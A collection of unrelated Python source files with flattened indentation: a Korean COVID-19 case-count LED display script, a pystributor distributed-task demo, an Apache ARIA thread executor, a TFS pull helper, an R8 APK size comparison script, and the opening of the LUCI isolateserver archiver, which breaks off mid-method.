confirmed_cmp.append({
'지역이름' : region,
'전날비교' : cmp_data
})
for i in range(0,len(confirmed_cmp)):
if (confirmed_cmp[i]['지역이름']) == search_region:
if confirmed_cmp[i]['전날비교'] > 5:
list_1 = [int(i) for i in str(confirmed_cmp[i]['전날비교'])]
for j in range(0,len(list_1)):
for x in range(5):
for y in range(19+4*j, 23+4*j):
array[x][y] = number_array_3[list_1[j]][x][y-19-4*j]
for x in range(5):
for y in range(19 + 4 * len(list_1), 19 + 4 * len(list_1) + 3): # 31~34
array[x][y] = arrow_array[0][x][y - 19 - 4 * len(list_1)]
elif confirmed_cmp[i]['전날비교'] > 2 and confirmed_cmp[i]['전날비교'] <= 5:
list_2 = [int(i) for i in str(confirmed_cmp[i]['전날비교'])]
for j in range(0, len(list_2)):
for x in range(5):
for y in range(19 + 4 * j, 23 + 4 * j):
array[x][y] = number_array_2[list_2[j]][x][y - 19 - 4 * j]
for x in range(5):
for y in range(19 + 4 * len(list_2), 19 + 4 * len(list_2) + 3): # 31~34
array[x][y] = arrow_array[0][x][y - 19 - 4 * len(list_2)]
elif confirmed_cmp[i]['전날비교'] >= 0 and confirmed_cmp[i]['전날비교'] <= 2:
list_3 = [int(i) for i in str(confirmed_cmp[i]['전날비교'])]
for j in range(0, len(list_3)):
for x in range(5):
for y in range(19 + 4 * j, 23 + 4 * j):
array[x][y] = number_array_4[list_3[j]][x][y - 19 - 4 * j]
for x in range(5):
for y in range(19+4*len(list_3),19+4*len(list_3)+3): #31~34
array[x][y] = arrow_array[0][x][y-19-4*len(list_3)]
return confirmed_cmp
# Look up the confirmed-case count for a region and draw it on the LED matrix
def search_count(js_file,search_region,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
print(json_data[i]['확진자수'])
list =[int(i) for i in str(json_data[i]['확진자수'])]
for j in range(0,len(list)):
for x in range(5):
for y in range(0+4*j,4+4*j):
array[x][y] = number_array[list[j]][x][y-4*j]
def main_UI(array):
for j in range(0,5):
for x in range(2,7):
for y in range(1+4*j,5+4*j):
array[x][y] = covid_array[j][x-2][y-4*j-1]
def all_count(js_file,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
list = [int(i) for i in str(json_data[0]['확진자수'])]
for j in range(0,len(list)):
for x in range(10,15):
for y in range(1+4*j,5+4*j):
array[x][y] = number_array[list[j]][x-10][y-4*j-1]
# Look up the day-over-day change in confirmed cases for a region
def count_change(js_file,search_region):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
return json_data[i]['전날비교']
def clear_array(array):
for i in range(16):
for j in range(32):
array[i][j] = 0
main_menu = 0
menu = 1
while(menu):
print("*****Menu*****")
print("1.All")
print("2.Seoul")
print("3.Gyeonggi")
print("4.Exit")
print("**************")
if main_menu == 0:
main_UI(array_screen)
file = 'koreaData_All' + '_' + a + '.js'
all_count(file, array_screen)
draw_matrix(array_screen);print()
compare_cmp = []
menu_choice = int(input("Select menu: "))
    # Each while loop below keeps serving the selected menu until the user enters 0 to go back
    while menu_choice == 1: # nationwide confirmed-case lookup
js_file = 'koreaData_All'+ '_'+ a +'.js'
js_file_yesterday = 'koreaData_All'+ '_'+ c +'.js'
search_region = input("지역을 입력하세요 (ex:서울): ")
clear_array(array_screen)
draw_matrix(array_screen);print()
search_count(js_file,search_region,array_screen)
compare_data(js_file,js_file_yesterday,search_region,compare_cmp,array_screen)
draw_matrix(array_screen);print()
        if search_region == '0': # entering 0 returns to the menu
compare_cmp = []
main_menu = 0
break
    while menu_choice == 2: # confirmed-case lookup for districts of Seoul
js_file = 'koreaData_Seoul'+ '_' + a + '.js'
js_file_yesterday = 'koreaData_Seoul'+ '_' + c + '.js'
search_region = input("지역을 입력하세요 (ex:종로구): ")
clear_array(array_screen)
draw_matrix(array_screen);print()
search_count(js_file,search_region,array_screen)
compare_data(js_file, js_file_yesterday, search_region, compare_cmp, array_screen)
draw_matrix(array_screen);print()
        if search_region == '0': # entering 0 returns to the menu
compare_cmp = []
main_menu = 0
break
    while menu_choice == 3: # confirmed-case lookup for cities in Gyeonggi
js_file = 'koreaData_Gyeonggi'+ '_'+ a + '.js'
js_file_yesterday = 'koreaData_Gyeonggi'+ '_'+ c + '.js'
search_region = input("지역을 입력하세요 (ex:수원): ")
clear_array(array_screen)
draw_matrix(array_screen);print()
search_count(js_file,search_region,array_screen)
compare_data(js_file, js_file_yesterday, search_region, compare_cmp, array_screen)
draw_matrix(array_screen);print()
#print(str(count_change(js_file,search_region)),"명 증가")
if search_region == '0': # 0을 입력하면 메뉴로 복귀
compare_cmp = []
main_menu = 0
break
    if menu_choice == 4: # exit the menu
menu = 0
|
demo.py
|
#!/usr/bin/python3
"""
This file is provided as a demonstration tool for using pystributor
"""
from pystributor.pystributor import Hub, Worker
from time import perf_counter
from os import system, name
import multiprocessing
from multiprocessing.managers import BaseManager
SAMPLE_ARGS = [(i,) for i in range(10**8, (10**8)+200)]
SAMPLE_TASK = """
def task(my_argument):
# When creating your own task, always name it task
def _my_bad_prime_number_checker(number):
# Returns true if prime, false otherwise
if number <= 1:
return False
for i in range(2, number):
if (number % i) == 0:
return False
return True
return _my_bad_prime_number_checker(my_argument)
"""
def _worker_helper():
"""This helper must be placed in this scope for windows compability"""
worker = Worker()
worker.start()
def main():
print("This python file is provided as a demo which uses pystributor to")
print("perform an example task. Different systems will have different")
print("performance characteristics. This will affect much performance")
print("can be gained by using pystributor. Certain tasks will perform")
print("worse with pystributor due to increased overhead.")
print()
print("If you test your own tasks, the most benefit will likely be")
print("gained for tasks that have a moderate amount of argument sets to")
print("distribute (in order of 100s or 1000s). Each argument should")
print("be maximally CPU intensive when processed on worker.")
print("")
print("You should take a look inside this demo file after trying it out.")
print("")
print("")
print("")
while True:
print("Enter H to start a hub. Enter W to start worker(s)")
print("(You will have to start at least two instances of this demo,")
print("one for hub and one for workers)")
inp = input(": ")
if inp == "H":
while True: # loop for valid input
worker_count = input("Please enter how many worker connections to wait for: ")
try:
worker_count = int(worker_count)
if worker_count <= 0:
continue
except ValueError:
pass
else:
break
hub = Hub(SAMPLE_TASK, SAMPLE_ARGS, poolsize=worker_count)
timestamp = perf_counter()
hub.start() # this blocks until answersheet is done
print("Time spent (including waiting for workers):", perf_counter()-timestamp)
print("\nSelected excerpt from hub.answersheet:")
print_counter = 0
for arg, ans in hub.answersheet.items():
if ans:
print(arg, "is prime.")
print_counter += 1
if print_counter >= 30:
break
break
if inp == "W":
while True: # loop for valid input
worker_count = input("Please enter the number of worker procsesses you want to create: ")
try:
worker_count = int(worker_count)
if worker_count <= 0:
continue
except ValueError:
pass
else:
break
worker_processes = []
            while True: # dirty hack; 5 lines of changes here.
for i in range(worker_count): # spawn multiple worker processes #!!!
process = multiprocessing.Process(target=_worker_helper) #!!!
worker_processes.append(process) #!!!
process.start() #!!!
while True: # block until all workers done
from time import sleep
sleep(1)
if all([not i.is_alive() for i in worker_processes]):
break
                break # THIS MUST BE KEPT #!!!!!
else:
continue
if __name__ == "__main__":
_ = system("cls||clear") # clear screen on windows and unix
multiprocessing.set_start_method('spawn')
#if name == "nt":
# # windows compability. default is to fork in windows.
# multiprocessing.set_start_method("spawn")
main()
|
thread.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Thread based executor
"""
import Queue
import threading
from aria.utils import imports
from .base import BaseExecutor
class ThreadExecutor(BaseExecutor):
"""
Executor which runs tasks in a separate thread. It's easier writing tests
using this executor rather than the full blown subprocess executor.
Note: This executor is not capable of running plugin operations.
"""
def __init__(self, pool_size=1, *args, **kwargs):
super(ThreadExecutor, self).__init__(*args, **kwargs)
self._stopped = False
self._queue = Queue.Queue()
self._pool = []
for i in range(pool_size):
name = 'ThreadExecutor-{index}'.format(index=i+1)
thread = threading.Thread(target=self._processor, name=name)
thread.daemon = True
thread.start()
self._pool.append(thread)
def execute(self, task):
self._queue.put(task)
def close(self):
self._stopped = True
for thread in self._pool:
thread.join()
def _processor(self):
while not self._stopped:
try:
task = self._queue.get(timeout=1)
self._task_started(task)
try:
task_func = imports.load_attribute(task.operation_mapping)
task_func(ctx=task.context, **task.inputs)
self._task_succeeded(task)
except BaseException as e:
self._task_failed(task, exception=e)
            # Queue.get timed out (or the interpreter is shutting down); these
            # are daemon threads, so just loop and re-check self._stopped.
except BaseException:
pass
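# Illustrative usage (the expected task shape is inferred from _processor above:
# it needs .operation_mapping, .context and .inputs):
#
#   executor = ThreadExecutor(pool_size=2)
#   executor.execute(task)   # queue the task for one of the pool threads
#   ...
#   executor.close()         # flag the threads to stop and join them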
|
tfs.py
|
import subprocess
import traceback
from threading import Thread
class TFS:
def __init__(self, site_id, site_path, app):
self._site_id = site_id
self._site_path = site_path
self._app = app
self._proc = None
def start_pull(self):
self._proc = subprocess.Popen(('tfs.bat', self._site_path),
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._clear_output()
self._set_output('Pull Process ID: ' + str(self._proc.pid) + '\r\n\r\n')
Thread(target=self._read).start()
def _set_output(self, text):
self._app.set_console_output(self._site_id, text)
def _clear_output(self):
self._app.clear_console_output(self._site_id)
def _wait_stop(self):
if self._proc:
code = self._proc.wait()
self._set_output('Pull Exit Code: ' + str(code))
self._proc = None
def _read(self):
try:
for line in self._proc.stdout:
self._set_output(line.decode())
if not line or line.startswith(b'-end'):
self._wait_stop()
break
except:
traceback.print_exc()
|
compare_apk_sizes.py
|
#!/usr/bin/env python
# Copyright (c) 2018, the R8 project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
# Script for checking impact of a change by comparing the sizes of generated
# classes in an apk.
import glob
import optparse
import os
import shutil
import sys
import threading
import time
import toolhelper
import utils
import zipfile
import StringIO
USAGE = """%prog [options] app1 app2
NOTE: This only makes sense if minification is disabled"""
MAX_THREADS=40
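# Example invocation (hypothetical paths):
#   ./compare_apk_sizes.py --use_code_size --report sizes.txt app_before.apk app_after.apk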
def parse_options():
result = optparse.OptionParser(usage=USAGE)
result.add_option('--temp',
help='Temporary directory to store extracted classes in')
result.add_option('--use_code_size',
help='Use the size of code segments instead of the full size of the dex.',
default=False, action='store_true')
result.add_option('--report',
help='Print comparison to this location instead of stdout')
return result.parse_args()
def extract_apk(apk, output):
if os.path.exists(output):
shutil.rmtree(output)
zipfile.ZipFile(apk).extractall(output)
with utils.ChangedWorkingDirectory(output):
dex = glob.glob('*.dex')
return [os.path.join(output, dexfile) for dexfile in dex]
def ensure_exists(files):
for f in files:
if not os.path.exists(f):
      raise Exception('%s does not exist' % f)
def extract_classes(input, output):
if os.path.exists(output):
shutil.rmtree(output)
os.makedirs(output)
args = ['--file-per-class',
'--output', output]
args.extend(input)
  if toolhelper.run('d8', args) != 0:
raise Exception('Failed running d8')
def get_code_size(path):
segments = toolhelper.run('dexsegments',
[path],
build=False,
return_stdout=True)
for line in segments.splitlines():
if 'Code' in line:
# The code size line looks like:
# - Code: 264 / 4
splits = line.split(' ')
return int(splits[3])
  # Some classes have no code.
return 0
class FileInfo:
def __init__(self, path, root):
self.path = path
self.full_path = os.path.join(root, path)
def __eq__(self, other):
return self.full_path == other.full_path
def set_size(self, use_code_size):
if use_code_size:
self.size = get_code_size(self.full_path)
else:
self.size = os.path.getsize(self.full_path)
def generate_file_info(path, options):
file_info_map = {}
with utils.ChangedWorkingDirectory(path):
for root, dirs, files in os.walk('.'):
for f in files:
assert f.endswith('dex')
file_path = os.path.join(root, f)
entry = FileInfo(file_path, path)
if not options.use_code_size:
entry.set_size(False)
file_info_map[file_path] = entry
threads = []
file_infos = file_info_map.values() if options.use_code_size else []
  while len(file_infos) > 0 or len(threads) > 0:
for t in threads:
if not t.is_alive():
threads.remove(t)
    # Wait a bit before polling again when the pool is full or nothing is left to schedule.
if len(threads) == MAX_THREADS or len(file_infos) == 0:
time.sleep(0.5)
while len(threads) < MAX_THREADS and len(file_infos) > 0:
info = file_infos.pop()
print('Added %s for size calculation' % info.full_path)
t = threading.Thread(target=info.set_size, args=(options.use_code_size,))
threads.append(t)
t.start()
    print('%s files left to process, threads=%s' % (len(file_infos), len(threads)))
return file_info_map
def print_info(app, app_files, only_in_app, bigger_in_app, output):
output.write('Only in %s\n' % app)
only_app_sorted = sorted(only_in_app,
key=lambda a: app_files[a].size,
reverse=True)
output.write('\n'.join([' %s %s bytes' %
(x, app_files[x].size) for x in only_app_sorted]))
output.write('\n\n')
output.write('Bigger in %s\n' % app)
# Sort by the percentage diff compared to size
percent = lambda a: (0.0 + bigger_in_app.get(a))/app_files.get(a).size * 100
for bigger in sorted(bigger_in_app, key=percent, reverse=True):
output.write(' {0:.3f}% {1} bytes {2}\n'.format(percent(bigger),
bigger_in_app[bigger],
bigger))
output.write('\n\n')
def compare(app1_classes_dir, app2_classes_dir, app1, app2, options):
app1_files = generate_file_info(app1_classes_dir, options)
app2_files = generate_file_info(app2_classes_dir, options)
only_in_app1 = [k for k in app1_files if k not in app2_files]
only_in_app2 = [k for k in app2_files if k not in app1_files]
in_both = [k for k in app2_files if k in app1_files]
assert len(app1_files) == len(only_in_app1) + len(in_both)
assert len(app2_files) == len(only_in_app2) + len(in_both)
bigger_in_app1 = {}
bigger_in_app2 = {}
same_size = []
for f in in_both:
app1_entry = app1_files[f]
app2_entry = app2_files[f]
if app1_entry.size > app2_entry.size:
bigger_in_app1[f] = app1_entry.size - app2_entry.size
elif app2_entry.size > app1_entry.size:
bigger_in_app2[f] = app2_entry.size - app1_entry.size
else:
same_size.append(f)
output = open(options.report, 'w') if options.report else sys.stdout
print_info(app1, app1_files, only_in_app1, bigger_in_app1, output)
print_info(app2, app2_files, only_in_app2, bigger_in_app2, output)
output.write('Same size\n')
output.write('\n'.join([' %s' % x for x in same_size]))
if options.report:
output.close()
def Main():
(options, args) = parse_options()
  if len(args) != 2:
    print(args)
    print('Takes exactly two arguments, the two apps to compare')
return 1
app1 = args[0]
app2 = args[1]
ensure_exists([app1, app2])
with utils.TempDir() as temporary:
# If a temp dir is passed in, use that instead of the generated temporary
output = options.temp if options.temp else temporary
ensure_exists([output])
app1_input = [app1]
app2_input = [app2]
if app1.endswith('apk'):
app1_input = extract_apk(app1, os.path.join(output, 'app1'))
if app2.endswith('apk'):
app2_input = extract_apk(app2, os.path.join(output, 'app2'))
app1_classes_dir = os.path.join(output, 'app1_classes')
app2_classes_dir = os.path.join(output, 'app2_classes')
extract_classes(app1_input, app1_classes_dir)
extract_classes(app2_input, app2_classes_dir)
compare(app1_classes_dir, app2_classes_dir, app1, app2, options)
if __name__ == '__main__':
sys.exit(Main())
|
isolateserver.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Archives a set of files or directories to an Isolate Server."""
__version__ = '0.9.0'
import collections
import errno
import functools
import logging
import optparse
import os
import re
import signal
import stat
import sys
import tarfile
import threading
import time
import zlib
from utils import tools
tools.force_local_third_party()
# third_party/
import colorama
from depot_tools import fix_encoding
from depot_tools import subcommand
import six
from six.moves import queue as Queue
# pylint: disable=ungrouped-imports
import auth
import isolated_format
import isolate_storage
import local_caching
from utils import file_path
from utils import fs
from utils import logging_utils
from utils import net
from utils import on_error
from utils import subprocess42
from utils import threading_utils
# Version of isolate protocol passed to the server in /handshake request.
ISOLATE_PROTOCOL_VERSION = '1.0'
# Maximum expected delay (in seconds) between successive file fetches or uploads
# in Storage. If it takes longer than that, a deadlock might be happening
# and all stack frames for all threads are dumped to log.
DEADLOCK_TIMEOUT = 5 * 60
# The number of files to check the isolate server per /pre-upload query.
# All files are sorted by likelihood of a change in the file content
# (currently file size is used to estimate this: larger the file -> larger the
# possibility it has changed). Then first ITEMS_PER_CONTAINS_QUERIES[0] files
# are taken and sent to '/pre-upload', then the next ITEMS_PER_CONTAINS_QUERIES[1],
# and so on. The numbers here are a trade-off; the more per request, the lower the
# effect of HTTP round trip latency and TCP-level chattiness. On the other hand,
# larger values cause longer lookups, increasing the initial latency to start
# uploading, which is especially an issue for large files. This value is
# optimized for the "few thousand files to look up with a minimal number of large
# files missing" case.
ITEMS_PER_CONTAINS_QUERIES = (20, 20, 50, 50, 50, 100)
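# Illustrative note (comments only, nothing executed here): with the tuple
# above, successive *full* batches sent to '/pre-upload' grow as
# 20, 20, 50, 50, 50, 100 and then stay at 100 items per query. Batches that
# are flushed by the 3 second timeout before filling up do not advance the
# index (see _create_items_batches_thread in Storage.upload_items below).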
# A list of already compressed extension types that should not receive any
# compression before being uploaded.
ALREADY_COMPRESSED_TYPES = [
'7z', 'avi', 'cur', 'gif', 'h264', 'jar', 'jpeg', 'jpg', 'mp4', 'pdf',
'png', 'wav', 'zip',
]
# The delay (in seconds) to wait between logging statements when retrieving
# the required files. This is intended to let the user (or buildbot) know that
# the program is still running.
DELAY_BETWEEN_UPDATES_IN_SECS = 30
DEFAULT_BLACKLIST = (
# Temporary vim or python files.
r'^.+\.(?:pyc|swp)$',
# .git or .svn directory.
r'^(?:.+' + re.escape(os.path.sep) + r'|)\.(?:git|svn)$',
)
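# Hedged sketch (comments only): the production filter is built through
# tools.gen_blacklist(), whose exact semantics are assumed here; matching the
# raw patterns with the standard re module behaves roughly like this:
#
#   _patterns = [re.compile(p) for p in DEFAULT_BLACKLIST]
#   any(p.match('foo/bar.pyc') for p in _patterns)                # True
#   any(p.match(os.path.join('src', '.git')) for p in _patterns)  # True
#   any(p.match('foo/bar.py') for p in _patterns)                 # False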
class Error(Exception):
"""Generic runtime error."""
pass
class Aborted(Error):
"""Operation aborted."""
pass
class AlreadyExists(Error):
"""File already exists."""
def file_read(path, chunk_size=isolated_format.DISK_FILE_CHUNK, offset=0):
"""Yields file content in chunks of |chunk_size| starting from |offset|."""
with fs.open(path, 'rb') as f:
if offset:
f.seek(offset)
while True:
data = f.read(chunk_size)
if not data:
break
yield data
def fileobj_path(fileobj):
"""Return file system path for file like object or None.
The returned path is guaranteed to exist and can be passed to file system
operations like copy.
"""
name = getattr(fileobj, 'name', None)
if name is None:
return None
# If the file like object was created using something like open("test.txt")
# name will end up being a str (such as a function outside our control, like
# the standard library). We want all our paths to be unicode objects, so we
# decode it.
if not isinstance(name, six.text_type):
# We incorrectly assume that UTF-8 is used everywhere.
name = name.decode('utf-8')
# fs.exists requires an absolute path, otherwise it will fail with an
# assertion error.
if not os.path.isabs(name):
return None
if fs.exists(name):
return name
return None
# TODO(tansell): Replace fileobj_copy with shutil.copyfileobj once proper file
# wrappers have been created.
def fileobj_copy(
dstfileobj, srcfileobj, size=-1,
chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Copy data from srcfileobj to dstfileobj.
Providing size means exactly that amount of data will be copied (if there
isn't enough data, an IOError exception is thrown). Otherwise all data until
the EOF marker will be copied.
"""
if size == -1 and hasattr(srcfileobj, 'tell'):
if srcfileobj.tell() != 0:
raise IOError('partial file but not using size')
written = 0
while written != size:
readsize = chunk_size
if size > 0:
readsize = min(readsize, size-written)
data = srcfileobj.read(readsize)
if not data:
if size == -1:
break
raise IOError('partial file, got %s, wanted %s' % (written, size))
dstfileobj.write(data)
written += len(data)
def putfile(srcfileobj, dstpath, file_mode=None, size=-1, use_symlink=False):
"""Put srcfileobj at the given dstpath with given mode.
The function aims to do this as efficiently as possible while still allowing
any possible file like object be given.
Creating a tree of hardlinks has a few drawbacks:
- tmpfs cannot be used for the scratch space. The tree has to be on the same
partition as the cache.
  - involves a write to the inode, which advances ctime and causes a metadata
    writeback (and thus disk seeking).
  - cache ctime cannot be used to detect modifications / corruption.
  - Some file systems (NTFS) have a 64k limit on the number of hardlinks per
    partition. This is why the function automatically falls back to copying the
    file content.
  - /proc/sys/fs/protected_hardlinks causes an additional check to ensure all
    hardlinks share the same owner.
- Anecdotal report that ext2 is known to be potentially faulty on high rate
of hardlink creation.
Creating a tree of symlinks has a few drawbacks:
- Tasks running the equivalent of os.path.realpath() will get the naked path
and may fail.
- Windows:
- Symlinks are reparse points:
https://msdn.microsoft.com/library/windows/desktop/aa365460.aspx
https://msdn.microsoft.com/library/windows/desktop/aa363940.aspx
- Symbolic links are Win32 paths, not NT paths.
https://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32-to-nt.html
- Symbolic links are supported on Windows 7 and later only.
- SeCreateSymbolicLinkPrivilege is needed, which is not present by
default.
- SeCreateSymbolicLinkPrivilege is *stripped off* by UAC when a restricted
RID is present in the token;
https://msdn.microsoft.com/en-us/library/bb530410.aspx
"""
srcpath = fileobj_path(srcfileobj)
if srcpath and size == -1:
    readonly = file_mode is None or not (
        file_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH))
if readonly:
# If the file is read only we can link the file
if use_symlink:
link_mode = file_path.SYMLINK_WITH_FALLBACK
else:
link_mode = file_path.HARDLINK_WITH_FALLBACK
else:
# If not read only, we must copy the file
link_mode = file_path.COPY
file_path.link_file(dstpath, srcpath, link_mode)
assert fs.exists(dstpath)
else:
# Need to write out the file
with fs.open(dstpath, 'wb') as dstfileobj:
fileobj_copy(dstfileobj, srcfileobj, size)
if sys.platform == 'win32' and file_mode and file_mode & stat.S_IWRITE:
# On windows, mode other than removing stat.S_IWRITE is ignored. Returns
# early to skip slow/unnecessary chmod call.
return
# file_mode of 0 is actually valid, so need explicit check.
if file_mode is not None:
fs.chmod(dstpath, file_mode)
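# Hedged usage sketch for putfile() (hypothetical paths, not executed): link or
# copy a source file object into place. With the defaults (file_mode=None,
# size=-1) a source backed by a real read-only file is hardlinked when
# possible and streamed otherwise.
#
#   with fs.open(u'/tmp/example_src.bin', 'rb') as src:
#     putfile(src, u'/tmp/example_dst.bin')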
def zip_compress(content_generator, level=7):
"""Reads chunks from |content_generator| and yields zip compressed chunks."""
compressor = zlib.compressobj(level)
for chunk in content_generator:
compressed = compressor.compress(chunk)
if compressed:
yield compressed
tail = compressor.flush(zlib.Z_FINISH)
if tail:
yield tail
def zip_decompress(
content_generator, chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Reads zipped data from |content_generator| and yields decompressed data.
Decompresses data in small chunks (no larger than |chunk_size|) so that
zip bomb file doesn't cause zlib to preallocate huge amount of memory.
Raises IOError if data is corrupted or incomplete.
"""
decompressor = zlib.decompressobj()
compressed_size = 0
try:
for chunk in content_generator:
compressed_size += len(chunk)
data = decompressor.decompress(chunk, chunk_size)
if data:
yield data
while decompressor.unconsumed_tail:
data = decompressor.decompress(decompressor.unconsumed_tail, chunk_size)
if data:
yield data
tail = decompressor.flush()
if tail:
yield tail
except zlib.error as e:
raise IOError(
'Corrupted zip stream (read %d bytes) - %s' % (compressed_size, e))
# Ensure all data was read and decompressed.
if decompressor.unused_data or decompressor.unconsumed_tail:
raise IOError('Not all data was decompressed')
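# Hedged round-trip sketch (not part of the upload/download flow):
# zip_compress() and zip_decompress() are inverses over chunked content.
#
#   _chunks = [b'hello ', b'isolate']
#   _packed = list(zip_compress(_chunks))
#   assert b''.join(zip_decompress(_packed)) == b'hello isolate'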
def _get_zip_compression_level(filename):
"""Given a filename calculates the ideal zip compression level to use."""
file_ext = os.path.splitext(filename)[1].lower()
# TODO(csharp): Profile to find what compression level works best.
return 0 if file_ext in ALREADY_COMPRESSED_TYPES else 7
def create_directories(base_directory, files):
"""Creates the directory structure needed by the given list of files."""
logging.debug('create_directories(%s, %d)', base_directory, len(files))
# Creates the tree of directories to create.
directories = set(os.path.dirname(f) for f in files)
for item in list(directories):
while item:
directories.add(item)
item = os.path.dirname(item)
for d in sorted(directories):
if d:
abs_d = os.path.join(base_directory, d)
if not fs.isdir(abs_d):
fs.mkdir(abs_d)
def _create_symlinks(base_directory, files):
"""Creates any symlinks needed by the given set of files."""
for filepath, properties in files:
if 'l' not in properties:
continue
if sys.platform == 'win32':
# TODO(maruel): Create symlink via the win32 api.
logging.warning('Ignoring symlink %s', filepath)
continue
outfile = os.path.join(base_directory, filepath)
try:
os.symlink(properties['l'], outfile) # pylint: disable=E1101
except OSError as e:
if e.errno == errno.EEXIST:
raise AlreadyExists('File %s already exists.' % outfile)
raise
class _ThreadFile(object):
"""Multithreaded fake file. Used by TarBundle."""
def __init__(self):
self._data = threading_utils.TaskChannel()
self._offset = 0
def __iter__(self):
return self._data
def tell(self):
return self._offset
def write(self, b):
self._data.send_result(b)
self._offset += len(b)
def close(self):
self._data.send_done()
class FileItem(isolate_storage.Item):
"""A file to push to Storage.
Its digest and size may be provided in advance, if known. Otherwise they will
be derived from the file content.
"""
def __init__(self, path, algo, digest=None, size=None, high_priority=False):
super(FileItem, self).__init__(
digest,
size if size is not None else fs.stat(path).st_size,
high_priority,
compression_level=_get_zip_compression_level(path))
self._path = path
self._algo = algo
self._meta = None
@property
def path(self):
return self._path
@property
def digest(self):
if not self._digest:
self._digest = isolated_format.hash_file(self._path, self._algo)
return self._digest
@property
def meta(self):
if not self._meta:
# TODO(maruel): Inline.
self._meta = isolated_format.file_to_metadata(self.path, 0, False)
# We need to hash right away.
self._meta['h'] = self.digest
return self._meta
def content(self):
return file_read(self.path)
class TarBundle(isolate_storage.Item):
"""Tarfile to push to Storage.
Its digest is the digest of all the files it contains. It is generated on the
fly.
"""
def __init__(self, root, algo):
# 2 trailing 512 bytes headers.
super(TarBundle, self).__init__(size=1024)
self._items = []
self._meta = None
self._algo = algo
self._root_len = len(root) + 1
# Same value as for Go.
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/tar_archiver.go
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/upload_tracker.go
self._archive_max_size = int(10e6)
@property
def digest(self):
if not self._digest:
self._prepare()
return self._digest
@property
def size(self):
if self._size is None:
self._prepare()
return self._size
def try_add(self, item):
"""Try to add this file to the bundle.
It is extremely naive but this should be just enough for
https://crbug.com/825418.
Future improvements should be in the Go code, and the Swarming bot should be
migrated to use the Go code instead.
"""
if not item.size:
return False
# pylint: disable=unreachable
rounded = (item.size + 512) & ~511
if rounded + self._size > self._archive_max_size:
return False
# https://crbug.com/825418
return False
self._size += rounded
self._items.append(item)
return True
def yield_item_path_meta(self):
"""Returns a tuple(Item, filepath, meta_dict).
If the bundle contains less than 5 items, the items are yielded.
"""
if len(self._items) < 5:
# The tarball is too small, yield individual items, if any.
for item in self._items:
yield item, item.path[self._root_len:], item.meta
else:
# This ensures self._meta is set.
p = self.digest + '.tar'
# Yield itself as a tarball.
yield self, p, self._meta
def content(self):
"""Generates the tarfile content on the fly."""
obj = _ThreadFile()
def _tar_thread():
try:
t = tarfile.open(
fileobj=obj, mode='w', format=tarfile.PAX_FORMAT, encoding='utf-8')
for item in self._items:
logging.info(' tarring %s', item.path)
t.add(item.path)
t.close()
except Exception:
logging.exception('Internal failure')
finally:
obj.close()
t = threading.Thread(target=_tar_thread)
t.start()
try:
for data in obj:
yield data
finally:
t.join()
def _prepare(self):
h = self._algo()
total = 0
for chunk in self.content():
h.update(chunk)
total += len(chunk)
# pylint: disable=attribute-defined-outside-init
# This is not true, they are defined in Item.__init__().
self._digest = h.hexdigest()
self._size = total
self._meta = {
'h': self.digest,
's': self.size,
't': u'tar',
}
class BufferItem(isolate_storage.Item):
"""A byte buffer to push to Storage."""
def __init__(self, buf, algo, high_priority=False):
super(BufferItem, self).__init__(
digest=algo(buf).hexdigest(),
size=len(buf),
high_priority=high_priority)
self._buffer = buf
def content(self):
return [self._buffer]
class Storage(object):
"""Efficiently downloads or uploads large set of files via StorageApi.
Implements compression support, parallel 'contains' checks, parallel uploads
and more.
Works only within single namespace (and thus hashing algorithm and compression
scheme are fixed).
Spawns multiple internal threads. Thread safe, but not fork safe. Modifies
signal handlers table to handle Ctrl+C.
"""
def __init__(self, storage_api):
self._storage_api = storage_api
self._cpu_thread_pool = None
self._net_thread_pool = None
self._aborted = False
self._prev_sig_handlers = {}
@property
def server_ref(self):
"""Shortcut to get the server_ref from storage_api.
This can be used to get the underlying hash_algo.
"""
return self._storage_api.server_ref
@property
def cpu_thread_pool(self):
"""ThreadPool for CPU-bound tasks like zipping."""
if self._cpu_thread_pool is None:
threads = max(threading_utils.num_processors(), 2)
max_size = long(2)**32 if sys.version_info.major == 2 else 2**32
if sys.maxsize <= max_size:
# On 32 bits userland, do not try to use more than 16 threads.
threads = min(threads, 16)
self._cpu_thread_pool = threading_utils.ThreadPool(2, threads, 0, 'zip')
return self._cpu_thread_pool
@property
def net_thread_pool(self):
"""AutoRetryThreadPool for IO-bound tasks, retries IOError."""
if self._net_thread_pool is None:
self._net_thread_pool = threading_utils.IOAutoRetryThreadPool()
return self._net_thread_pool
def close(self):
"""Waits for all pending tasks to finish."""
logging.info('Waiting for all threads to die...')
if self._cpu_thread_pool:
self._cpu_thread_pool.join()
self._cpu_thread_pool.close()
self._cpu_thread_pool = None
if self._net_thread_pool:
self._net_thread_pool.join()
self._net_thread_pool.close()
self._net_thread_pool = None
logging.info('Done.')
def abort(self):
"""Cancels any pending or future operations."""
    # This is not strictly threadsafe, but in the worst case the logging message
# will be printed twice. Not a big deal. In other places it is assumed that
# unprotected reads and writes to _aborted are serializable (it is true
# for python) and thus no locking is used.
